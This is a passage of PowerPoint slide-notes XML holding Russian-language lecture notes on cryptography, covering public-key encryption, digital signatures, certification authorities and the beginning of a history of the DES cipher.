          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>В системах с открытым ключом ключ зашифровки не храниться в тайне (как говорит Владимир Михайлович Деундяк - «ключ зашифровки печатается в газете»). Поэтому злоумышленник может притвориться отправителем и послать зашифрованное ложное сообщение. Чтобы предотвратить эту возможность используется электронно-цифровая подпись: хеш от зашифрованного сообщения шифруется известным только отправителю ключом ЭЦП. Ключ расшифровки ЭЦП – открыт, чтобы любой мог проверить подлинность отправителя (т.е. тот факт, что именно отправитель послал сообщение).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Вторые еще называются криптосистемами с открытым ключом</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Исторически процесс передачи ключа всегда был слабым звеном почти по всех</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системах шифрования. Независимо от того, насколько прочна была сама крипто-</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система, если нарушитель мог украсть ключ, система становилась бесполезной.</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До 1976 года все криптологи исходили из предпосылки, что ключ дешифрации</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должен быть идентичен ключу шифрования (или один может легко получиться</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из другого). В то же время, ключи должны были быть у всех пользователей систе-</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мы. Таким образом, казалось, что эта проблема неустранима: ключи должны быть</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защищены от кражи, и в то же время их нужно распространять среди пользовате-</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лей, поэтому их нельзя просто хранить в банковском сейфе.</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В 1976 году два исследователя из Стэнфордского университета, Диффи (Diffie)</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и Хеллман (Hellman), предложили радикально новую криптосистему, в которой</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ключ шифрования и ключ дешифрации были различными, кроме того, ключ де-</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шифрации нельзя было получить из ключа шифрования. Предложенные ими ал-</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горитм шифрования Е и алгоритм дешифрации D (оба параметризованные клю-</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чом) должны были удовлетворять следующим трем требованиям:</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1. D(E(P)) = Р.</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2. Крайне сложно вывести D из Е.</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3. Е нельзя взломать при помощи произвольного открытого текста.</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Первое требование состоит в том, что если применить алгоритм дешифрации</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D к зашифрованному сообщению Е(Р), то мы опять получим открытый текст Р.</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Без этого авторизованный получатель просто не сможет расшифровать сообще-</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ние. Второе требование говорит само за себя. Третье требование необходимо, по-</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тому что, как мы скоро увидим, злоумышленники могут экспериментировать с</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алгоритмом столько, сколько пожелают. При таких условиях нет никаких при-</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чин, по которым ключ шифрования нельзя было бы сделать общедоступным.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подлинность различных бумажных документов (юридических, финансовых</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и др.) определяется наличием или отсутствием авторизованной рукописной под-</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писи. Фотокопии документами не считаются. Чтобы системы компьютерных со-</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общений могли заменить физическое перемещение документов, написанных чер-</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нилами на бумаге, нужно решить проблему подписи.</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Проблема разработки замены рукописной подписи довольно сложна. По су-</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ществу, требуется система, с помощью которой одна сторона могла бы послать</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другой стороне «подписанное» сообщение так, чтобы:</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>получатель мог проверить объявленную личность отправителя;</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 отправитель не мог позднее отрицать содержимое сообщения;</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4- получатель не мог позднее изменить подписанное сообщение.</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Первое требование существенно, например, для финансовых систем. Когда</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компьютер клиента заказывает компьютеру банка купить тонну золота, банков-</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ский компьютер должен быть уверен, что компьютер, пославший заказ, действи-</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тельно принадлежит компании, со счета которой следует снять денежную сумму.</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Другими словами, банк должен иметь возможность установить подлинность</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клиента (а клиент — подлинность банка).</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Второе требование необходимо для защиты банка от мошенничества. Предпо-</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ложим, что банк покупает тонну золота, и сразу после этого цена на золото резко</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падает. Бесчестный клиент может подать в суд на банк, заявляя, что он никогда</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не посылал заказа на покупку золота. Банк может показать сообщение в суде, но</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клиент будет отрицать, что посылал его. Таким образом, должно быть обеспече-</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но требование невозможности отречения от данных ранее обязательств. Мето-</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ды составления цифровых подписей, которые мы изучим далее, предназначены</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в том числе и для этого.</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Третье требование нужно для защиты клиента в случае, если цена на золото</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после его покупки банком взлетает вверх и банк пытается создать подписанное</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сообщение, в котором клиент просит купить не одну тонну золота, а один сли-</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ток. При таком сценарии банк, совершив мошенничество, забирает оставшуюся</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часть золота себе.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>В качестве примера рассмотрим такую ситуацию: Боб хочет разрешить Алисе</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>и другим лицам устанавливать с ним защищенные соединения. Он приходит в</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Управление сертификации со своим открытым ключом, а также паспортом или</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>другим удостоверением личности и просит зарегистрировать ключ. Управление</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>выдает ему сертификат, напоминающий тот, что показан на рис, и подписы-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>вает хэш SHA-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>своим закрытым ключом</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>. Затем Боб оплачивает услуги Управ-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ления и получает дискету с сертификатом и подписанным хэшем.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Основная задача сертификата состоит в связывании открытого ключа с име-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>нем принципала (физического или юридического лица). Сертификаты сами по</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>себе никак не защищаются и не хранятся в тайне. Например, Боб может выло-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>жить его на свой сайт и поставить ссылку: «Здесь можно посмотреть на серти-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>фикат моего открытого ключа». Перейдя по этой ссылке, пользователь увидит</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>и сертификат, и блок с подписью (подписанный хэш SHA-1 сертификата).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ зашифровки сертификационного центра не известен никому, зато все могут расшифровать подпись центра сертификации и проверить данные из сертификата.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>В январе 1977 году правительство Соединенных Штатов приняло продукцион-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ный шифр, разработанный фирмой IBM, в качестве официального стандарта для</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>несекретных сведений. Этот шифр, получивший название DES (Data Encryption</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Standard — стандарт шифрования данных), получил широкое распространение в</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
